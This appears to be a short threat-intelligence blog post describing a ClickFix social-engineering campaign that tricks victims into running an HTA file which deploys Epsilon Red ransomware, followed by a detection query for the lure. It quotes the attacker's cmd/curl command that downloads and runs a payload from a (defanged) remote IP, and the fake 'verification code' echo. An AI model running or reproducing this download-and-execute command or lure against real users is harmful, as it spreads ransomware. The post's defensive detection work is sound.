209. Threat Actors Leverage ClickFix to Deploy Epsilon Red Ransomware
Hello everyone!
Zero days without ClickFix. This time an adversary leveraged this technique to deploy Epsilon Red ransomware.
This time the "verification" process was a bit unusual. A victim needed to save copied data as an HTA file, execute it, get the code and paste it to another window.
First, the file executes a command to download and execute an Epsilon Red payload:
cmd /c cd /D %userprofile% && curl -s -o a.exe hxxp://155.94.155[.]227:2269/dw/vir.exe && a.exe
Next, it provides the "code":
cmd /c echo Your Verificatification Code Is: PC-19fj5e9i-cje8i3e4 && pause
And here we have an interesting detection opportunity:
event_type: "processcreatewin"
AND
proc_file_path: "cmd.exe"
AND
cmdline: ("echo" AND "verificatification code")
See you tomorrow!
Comments
Post a Comment